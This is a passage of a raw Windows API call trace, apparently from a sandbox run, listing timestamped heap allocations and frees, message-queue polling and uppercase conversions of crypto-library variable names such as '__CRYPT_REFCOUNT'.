hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0120.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0120.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0120.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0120.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.230] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0120.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0120.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0120.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0120.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0120.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0120.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0120.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0120.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0120.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0120.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0120.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.231] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0120.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0120.231] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0120.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0120.232] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0120.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0120.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0120.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0120.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0120.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0120.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0120.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0120.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0120.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0120.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0120.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0120.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9578 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0120.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0120.236] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0120.236] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0120.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0120.236] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0120.236] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0120.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0120.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0120.236] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0120.237] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0120.237] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0120.237] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0120.237] 